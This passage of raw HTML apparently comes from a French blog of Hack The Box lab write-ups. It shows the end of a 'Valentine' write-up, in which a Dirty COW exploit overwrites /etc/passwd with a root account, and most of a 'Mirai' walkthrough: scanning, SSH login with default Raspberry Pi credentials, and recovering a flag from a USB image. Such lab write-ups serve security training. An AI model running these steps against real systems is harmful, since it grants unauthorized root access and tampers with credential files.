class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hype@Valentine:~$ gcc -pthread diirty.c -o diirty -lcrypt </span></span><span class="line"><span class="cl">hype@Valentine:~$ chmod +x diirty </span></span><span class="line"><span class="cl">hype@Valentine:~$ ./diirty </span></span><span class="line"><span class="cl">/etc/passwd successfully backed up to /tmp/passwd.bak </span></span><span class="line"><span class="cl">Please enter the new password: </span></span><span class="line"><span class="cl">Complete line: </span></span><span class="line"><span class="cl">firefart:fiL7R2XneVpAU:0:0:pwned:/root:/bin/bash </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">mmap: 7f0df1fda000 </span></span><span class="line"><span class="cl">madvise <span class="m">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ptrace <span class="m">0</span> </span></span><span class="line"><span class="cl">Done! Check /etc/passwd to see <span class="k">if</span> the new user was created. </span></span><span class="line"><span class="cl">You can log in with the username <span class="s1">&#39;firefart&#39;</span> and the password <span class="s1">&#39;hello&#39;</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">DON<span class="s1">&#39;T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd </span></span></span><span class="line"><span class="cl"><span class="s1">Done! Check /etc/passwd to see if the new user was created. </span></span></span><span class="line"><span class="cl"><span class="s1">You can log in with the username &#39;</span>firefart<span class="s1">&#39; and the password &#39;</span>hello<span class="s1">&#39;. </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">DON&#39;</span>T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd </span></span><span class="line"><span class="cl">hype@Valentine:~$ cat /etc/passwd </span></span><span class="line"><span class="cl">firefart:fiL7R2XneVpAU:0:0:pwned:/root:/bin/bash </span></span><span class="line"><span class="cl">/sbin:/bin/sh </span></span><span class="line"><span class="cl">bin:x:2:2:bin:/bin:/bin/sh </span></span><span class="line"><span class="cl">sys:x:3:3:sys:/dev:/bin/sh </span></span><span class="line"><span class="cl">sync:x:4:65534:sync:/bin:/bin/sync </span></span><span class="line"><span class="cl">games:x:5:60:games:/usr/games:/bin/sh </span></span><span class="line"><span class="cl">man:x:6:12:man:/var/cache/man:/bin/sh </span></span><span class="line"><span class="cl">lp:x:7:7:lp:/var/spool/lpd:/bin/sh </span></span><span class="line"><span class="cl">mail:x:8:8:mail:/var/mail:/bin/sh </span></span><span class="line"><span class="cl">news:x:9:9:news:/var/spool/news:/bin/sh </span></span><span class="line"><span class="cl">uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh </span></span><span class="line"><span class="cl">proxy:x:13:13:proxy:/bin:/bin/sh </span></span><span class="line"><span class="cl">www-data:x:33:33:www-data:/var/www:/bin/sh </span></span><span class="line"><span class="cl">backup:x:34:34:backup:/var/backups:/bin/sh </span></span><span class="line"><span class="cl">list:x:38:38:Mailing List Manager:/var/list:/bin/sh </span></span><span class="line"><span class="cl">irc:x:39:39:ircd:/var/run/ircd:/bin/sh </span></span><span class="line"><span class="cl">gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/bin/sh </span></span><span class="line"><span class="cl">nobody:x:65534:65534:nobody:/nonexistent:/bin/sh </span></span><span class="line"><span class="cl">libuuid:x:100:101::/var/lib/libuuid:/bin/sh </span></span><span class="line"><span class="cl">syslog:x:101:103::/home/syslog:/bin/false </span></span><span class="line"><span class="cl">messagebus:x:102:105::/var/run/dbus:/bin/false </span></span><span class="line"><span class="cl">colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false </span></span><span class="line"><span class="cl">lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false </span></span><span class="line"><span class="cl">whoopsie:x:105:114::/nonexistent:/bin/false </span></span><span class="line"><span class="cl">avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false </span></span><span class="line"><span class="cl">avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false </span></span><span class="line"><span class="cl">usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false </span></span><span class="line"><span class="cl">kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false </span></span><span class="line"><span class="cl">pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false </span></span><span class="line"><span class="cl">rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false </span></span><span class="line"><span class="cl">speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh </span></span><span class="line"><span class="cl">hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false </span></span><span class="line"><span class="cl">saned:x:114:123::/home/saned:/bin/false </span></span><span class="line"><span class="cl">hype:x:1000:1000:Hemorrhage,,,:/home/hype:/bin/bash </span></span><span class="line"><span class="cl">sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">hype@Valentine:~$ su firefart </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl">firefart@Valentine:/home/hype# whoami </span></span><span class="line"><span class="cl">firefart </span></span><span class="line"><span class="cl">firefart@Valentine:/home/hype# cat /root/root.txt </span></span><span class="line"><span class="cl">ced9.....6598 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/mirai-htb/Thu, 06 Feb 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/mirai-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Mirai cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Mirai</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.48</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv 10.10.10.48 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 6.7p1 Debian 5+deb8u3 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">1024</span> aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 <span class="o">(</span>DSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-dss AAAAB3NzaC1kc3MAAACBAJpzaaGcmwdVrkG//X5kr6m9em2hEu3SianCnerFwTGHgUHrRpR6iocVhd8gN21TPNTwFF47q8nUitupMBnvImwAs8NcjLVclPSdFJSWwTxbaBiXOqyjV5BcKty+s2N8I9neI2coRBtZDUwUiF/1gUAZIimeKOj2x39kcBpcpM6ZAAAAFQDwL9La/FPu1rEutE8yfdIgxTDDNQAAAIBJbfYW/IeOFHPiKBzHWiM8JTjhPCcvjIkNjKMMdS6uo00/JQH4VUUTscc/LTvYmQeLAyc7GYQ/AcLgoYFHm8hDgFVN2D4BQ7yGQT9dU4GAOp4/H1wHPKlAiBuDQMsyEk2s2J+60Rt+hUKCZfnxPOoD9l+VEWfZQYCTOBi3gOAotgAAAIBd6OWkakYL2e132lg6Z02202PIq9zvAx3tfViuU9CGStiIW4eH4qrhSMiUKrhbNeCzvdcw6pRWK41+vDiQrhV12/w6JSowf9KHxvoprAGiEg7GjyvidBr9Mzv1WajlU9BQO0Nc7poV2UzyMwLYLqzdjBJT28WUs3qYTxanaUrV9g<span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpSoRAKB+cPR8bChDdajCIpf4p1zHfZyu2xnIkqRAgm6Dws2zcy+VAZriPDRUrht10GfsBLZtp/1PZpkUd2b1PKvN2YIg4SDtpvTrdwAM2uCgUrZdKRoFa+nd8REgkTg8JRYkSGQ/RxBZzb06JZhRSvLABFve3rEPVdwTf4mzzNuryV4DNctrAojjP4Sq7Msc24poQRG9AkeyS1h4zrZMbB0DQaKoyY3pss5FWJ+qa83XNsqjnKlKhSbjH17pBFhlfo/6bGkIE68vS5CQi9Phygke6/a39EP2pJp6WzT5KI3Yosex3Br85kbh/J8CVf4EDIRs5qismW+AZLeJUJHrj </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCl89gWp+rA+2SLZzt3r7x+9sXFOCy9g3C9Yk1S21hT/VOmlqYys1fbAvqwoVvkpRvHRzbd5CxViOVih0TeW/bM<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILvYtCvO/UREAhODuSsm7liSb9SZ8gLoZtn7P46SIDZL </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">63</span> dnsmasq 2.76 </span></span><span class="line"><span class="cl"><span class="p">|</span> dns-nsid: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ bind.version: dnsmasq-2.76 </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> lighttpd 1.4.35 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: lighttpd/1.4.35 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Site doesn<span class="err">&#39;</span>t have a title <span class="o">(</span>text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8<span class="o">)</span>. </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: OPTIONS GET HEAD POST </span></span></code></pre></td></tr></table> </div> </div><h3 id="gobuster--website-port-80">gobuster : Website port 80 </h3><p>On trouve notamment un dossier .git</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Mirai/pi_git_repo<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ gobuster dir -u http://10.10.10.48/admin -t <span class="m">50</span> -w /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://10.10.10.48/admin </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">50</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Negative Status codes: <span class="m">404</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: <span class="nv">10s</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in directory enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">/.git/HEAD <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 23<span class="o">]</span> </span></span><span class="line"><span class="cl">/img <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 0<span class="o">]</span> <span class="o">[</span>--&gt; http://10.10.10.48/admin/img/<span class="o">]</span> </span></span><span class="line"><span class="cl">/LICENSE <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 14164<span class="o">]</span> </span></span><span class="line"><span class="cl">/index.php <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 14620<span class="o">]</span> </span></span><span class="line"><span class="cl">/scripts <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 0<span class="o">]</span> <span class="o">[</span>--&gt; http://10.10.10.48/admin/scripts/<span class="o">]</span> </span></span><span class="line"><span class="cl">/style <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 0<span class="o">]</span> <span class="o">[</span>--&gt; http://10.10.10.48/admin/style/<span class="o">]</span> </span></span><span class="line"><span class="cl">Progress: <span class="m">4614</span> / <span class="m">4615</span> <span class="o">(</span>99.98%<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="nv">Finished</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold--pi-hole">Foothold : Pi Hole </h2><h3 id="burp">Burp </h3><p>On remplace dans la requete HTTP le champs &ldquo;HOST: 10.10.10.48&rdquo; par autre chose par exemple &ldquo;HOST: test&rdquo;. Et là, on observe une réponse avec un code source (alors que de base on avait une réponse sans code source, vide&hellip;).</p> <p>Dans le code source, on trouve un nom de domaine:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p">&lt;</span><span class="nt">script</span> <span class="na">src</span><span class="o">=</span><span class="s">&#34;http://pi.hole/admin/scripts/vendor/jquery.min.js&#34;</span><span class="p">&gt;</span> </span></span></code></pre></td></tr></table> </div> </div><p>On obtient : <code>pi.hole</code></p> <p>Cela suggère :</p> <ul> <li>Un filtrage basé sur l’en-tête Host (pratique courante avec des reverse proxies ou des DNS internes).</li> <li>Le serveur attend des requêtes destinées à un domaine spécifique, probablement configuré localement.</li> </ul> <h3 id="dig">dig </h3><p>On sait qu&rsquo;il y a un dns sur ce serveur (port 53). Donc, d&rsquo;après ippsec (et oui j&rsquo;ai pas trouvé ça tt seul&hellip;), on peut faire :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Mirai/pi-hole-3.1.4<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ dig @10.10.10.48 pi.hole </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">;</span> &lt;&lt;&gt;&gt; DiG 9.20.3-1-Debian &lt;&lt;&gt;&gt; @10.10.10.48 pi.hole </span></span><span class="line"><span class="cl"><span class="p">;</span> <span class="o">(</span><span class="m">1</span> server found<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> global options: +cmd </span></span><span class="line"><span class="cl"><span class="p">;;</span> Got answer: </span></span><span class="line"><span class="cl"><span class="p">;;</span> -&gt;&gt;HEADER<span class="s">&lt;&lt;- opco</span>de: QUERY, status: NOERROR, id: <span class="m">32672</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> flags: qr aa rd ra<span class="p">;</span> QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">;;</span> OPT PSEUDOSECTION: </span></span><span class="line"><span class="cl"><span class="p">;</span> EDNS: version: 0, flags:<span class="p">;</span> udp: <span class="m">4096</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> QUESTION SECTION: </span></span><span class="line"><span class="cl"><span class="p">;</span>pi.hole. IN A </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">;;</span> ANSWER SECTION: </span></span><span class="line"><span class="cl">pi.hole. <span class="m">300</span> IN A 192.168.204.129 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">;;</span> Query time: <span class="m">20</span> msec </span></span><span class="line"><span class="cl"><span class="p">;;</span> SERVER: 10.10.10.48#53<span class="o">(</span>10.10.10.48<span class="o">)</span> <span class="o">(</span>UDP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> WHEN: Wed Feb <span class="m">05</span> 17:08:46 EST <span class="m">2025</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> MSG SIZE rcvd: <span class="m">52</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="ssh-default-credentials---raspberry-pi">SSH Default Credentials - Raspberry PI </h2><p>Après la découverte de pi hole, il en déduire que la machine est un raspberry pi. Or, les credentials SSH par défaut sur un raspberry sont: <code>pi:rasberry</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Mirai/pi-hole-3.1.4<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh pi@10.10.10.48 </span></span><span class="line"><span class="cl">The authenticity of host <span class="s1">&#39;10.10.10.48 (10.10.10.48)&#39;</span> can<span class="s1">&#39;t be established. </span></span></span><span class="line"><span class="cl"><span class="s1">ED25519 key fingerprint is SHA256:TL7joF/Kz3rDLVFgQ1qkyXTnVQBTYrV44Y2oXyjOa60. </span></span></span><span class="line"><span class="cl"><span class="s1">This key is not known by any other names. </span></span></span><span class="line"><span class="cl"><span class="s1">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes </span></span></span><span class="line"><span class="cl"><span class="s1">Warning: Permanently added &#39;</span>10.10.10.48<span class="s1">&#39; (ED25519) to the list of known hosts. </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">pi@10.10.10.48&#39;</span>s password: raspberry </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">pi@raspberrypi:~ $ cat Desktop/user.txt </span></span><span class="line"><span class="cl">ff83.....838d </span></span><span class="line"><span class="cl">pi@raspberrypi:~ $ </span></span></code></pre></td></tr></table> </div> </div><h2 id="fake-root-flag">Fake root flag </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">pi@raspberrypi:~/python_games $ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> pi on localhost: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User pi may run the following commands on localhost: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL : ALL<span class="o">)</span> ALL </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: ALL </span></span><span class="line"><span class="cl">pi@raspberrypi:~/python_games $ sudo su </span></span><span class="line"><span class="cl">root@raspberrypi:/home/pi/python_games# cat /root/root.txt </span></span><span class="line"><span class="cl">I lost my original root.txt! I think I may have a backup on my USB stick... </span></span></code></pre></td></tr></table> </div> </div><h2 id="restoring-root-flag">Restoring Root flag </h2><h2 id="usbstick">usbstick </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root@raspberrypi:/media# lsblk </span></span><span class="line"><span class="cl">NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT </span></span><span class="line"><span class="cl">sda 8:0 <span class="m">0</span> 10G <span class="m">0</span> disk </span></span><span class="line"><span class="cl">├─sda1 8:1 <span class="m">0</span> 1.3G <span class="m">0</span> part /lib/live/mount/persistence/sda1 </span></span><span class="line"><span class="cl">└─sda2 8:2 <span class="m">0</span> 8.7G <span class="m">0</span> part /lib/live/mount/persistence/sda2 </span></span><span class="line"><span class="cl">sdb 8:16 <span class="m">0</span> 10M <span class="m">0</span> disk /media/usbstick </span></span><span class="line"><span class="cl">sr0 11:0 <span class="m">1</span> 1024M <span class="m">0</span> rom </span></span><span class="line"><span class="cl">loop0 7:0 <span class="m">0</span> 1.2G <span class="m">1</span> loop /lib/live/mount/rootfs/filesystem.squashfs </span></span><span class="line"><span class="cl">root@raspberrypi:/media/usbstick# cat </span></span><span class="line"><span class="cl">damnit.txt lost+found/ </span></span><span class="line"><span class="cl">root@raspberrypi:/media/usbstick# cat damnit.txt </span></span><span class="line"><span class="cl">Damnit! Sorry man I accidentally deleted your files off the USB stick. </span></span><span class="line"><span class="cl">Do you know <span class="k">if</span> there is any way to get them back? </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-James </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## On aurait aussi pu faire :</span> </span></span><span class="line"><span class="cl">root@raspberrypi:~# df -lh </span></span><span class="line"><span class="cl">Filesystem Size Used Avail Use% Mounted on </span></span><span class="line"><span class="cl">aufs 8.5G 2.8G 5.3G 35% / </span></span><span class="line"><span class="cl">tmpfs 100M 13M 88M 13% /run </span></span><span class="line"><span class="cl">/dev/sda1 1.3G 1.3G <span class="m">0</span> 100% /lib/live/mount/persistence/sda1 </span></span><span class="line"><span class="cl">/dev/loop0 1.3G 1.3G <span class="m">0</span> 100% /lib/live/mount/rootfs/filesystem.squashfs </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">/dev/sdb 8.7M 93K 7.9M 2% /media/usbstick </span></span><span class="line"><span class="cl">tmpfs 50M <span class="m">0</span> 50M 0% /run/user/999 </span></span><span class="line"><span class="cl">tmpfs 50M <span class="m">0</span> 50M 0% /run/user/1000 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">root@raspberrypi:~# mount </span></span><span class="line"><span class="cl">sysfs on /sys <span class="nb">type</span> sysfs <span class="o">(</span>rw,nosuid,nodev,noexec,relatime<span class="o">)</span> </span></span><span class="line"><span class="cl">proc on /proc <span class="nb">type</span> proc <span class="o">(</span>rw,nosuid,nodev,noexec,relatime<span class="o">)</span> </span></span><span class="line"><span class="cl">tmpfs on /run <span class="nb">type</span> tmpfs <span class="o">(</span>rw,nosuid,relatime,size<span class="o">=</span>102396k,mode<span class="o">=</span>755<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">/dev/sdb on /media/usbstick <span class="nb">type</span> ext4 <span class="o">(</span>ro,nosuid,nodev,noexec,relatime,data<span class="o">=</span>ordered<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="creating-image-of-the-usb-key">Creating image of the usb key </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root@raspberrypi:~# dd <span class="k">if</span><span class="o">=</span>/dev/sdb <span class="nv">of</span><span class="o">=</span>/root/usbstick.img <span class="nv">bs</span><span class="o">=</span>4M </span></span><span class="line"><span class="cl">2+1 records in </span></span><span class="line"><span 